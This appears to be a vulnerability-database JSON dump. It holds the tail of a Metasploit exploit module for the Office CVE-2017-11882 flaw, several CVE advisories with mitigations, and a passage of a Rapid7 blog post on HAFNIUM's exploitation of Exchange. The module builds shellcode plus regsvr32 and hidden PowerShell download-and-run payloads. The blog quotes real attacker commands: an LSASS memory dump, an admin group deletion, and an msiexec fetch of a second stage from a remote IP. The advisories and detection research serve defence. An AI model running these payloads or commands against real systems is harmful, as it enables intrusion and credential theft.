\"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-09T02:14:05", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "VMware vCenter: CVE-2021-21985: Remote Code Execution (RCE) vulnerability in VMware vCenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/VMSA-2021-0010-CVE-2021-21985-VCENTER/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-07T22:49:43", "description": "There exists an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft CVE-2021-26857: Microsoft Exchange Server Remote Code Execution Vulnerability (HAFNIUM Exploited)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/MSFT-CVE-2021-26857/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-07-30T22:59:39", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before\n8.5.1 allows remote attackers to execute arbitrary code because of an issue\naffecting multiple subsystems with default or common module configurations.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "ubuntucve", "title": "CVE-2018-7600", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T00:00:00", "id": "UB:CVE-2018-7600", "href": "https://ubuntu.com/security/CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T21:42:56", "description": "An elevation of privilege vulnerability exists when an attacker establishes\na vulnerable Netlogon secure channel connection to a domain controller,\nusing the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of\nPrivilege Vulnerability'.\n\n#### Bugs\n\n * <https://bugzilla.samba.org/show_bug.cgi?id=14497>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | Starting with Samba 4.8, \"server schannel\" defaults to \"yes\" instead of \"auto\". This is sufficient to address this vulnerability. See details in the upstream bug report. There may be an additional commit to make ServerAuthenticate3 fail so that the false positive reported by the third party vulnerability scanning tools is fixed.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-16T00:00:00", "type": "ubuntucve", "title": "CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-16T00:00:00", "id": "UB:CVE-2020-1472", "href": "https://ubuntu.com/security/CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-09-02T22:33:36", "description": "A flaw was found in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC), where it reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode. This flaw allows an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and possibly obtain domain administrator privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.\n#### Mitigation\n\nThis flaw can be mitigated by using &quot;server schannel = yes&quot; in the smb.conf configuration file. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-17T06:30:08", "type": "redhatcve", "title": "CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-08-09T12:53:01", "id": "RH:CVE-2020-1472", "href": "https://access.redhat.com/security/cve/cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-09-26T22:28:10", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T18:25:00", "type": "f5", "title": "Drupal vulnerability CVE-2018-7600", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T18:25:00", "id": "F5:K22854260", "href": "https://support.f5.com/csp/article/K22854260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2021-07-28T14:40:37", "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\r\n\r\nh4. *Fix:*\r\n * Crowd and Crowd Data Center version 3.4.4 is available for download from [https://www.atlassian.com/software/crowd/download]\r\n * Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 are available for download from [https://www.atlassian.com/software/crowd/download-archive]\r\n\r\n\u00a0\r\n*Mitigation*\r\n\r\nAtlassian recommends that you upgrade to the latest version. However, this issue can be mitigated as per the following instructions:\r\n # Stop Crowd\r\n # Find and delete any\u00a0pdkinstall-plugin jar files from the Crowd *installation directory and the data directory*\r\n # Remove the\u00a0pdkinstall-plugin jar file from <Crowd installation directory>/crowd-webapp/WEB-INF/classes/atlassian-bundled-plugins.zip\r\n # Start Crowd\r\n # Check that there are no\u00a0pdkinstall-plugin jar files in the *installation directory or the data directory.*\u00a0\r\n\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/x/3ADVOQ].", "edition": 12, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-06T04:06:13", "title": "Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580", "type": "atlassian", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-02-17T05:14:59", "id": "ATLASSIAN:CWD-5388", "href": "https://jira.atlassian.com/browse/CWD-5388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. \n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&amp;CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * [T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * 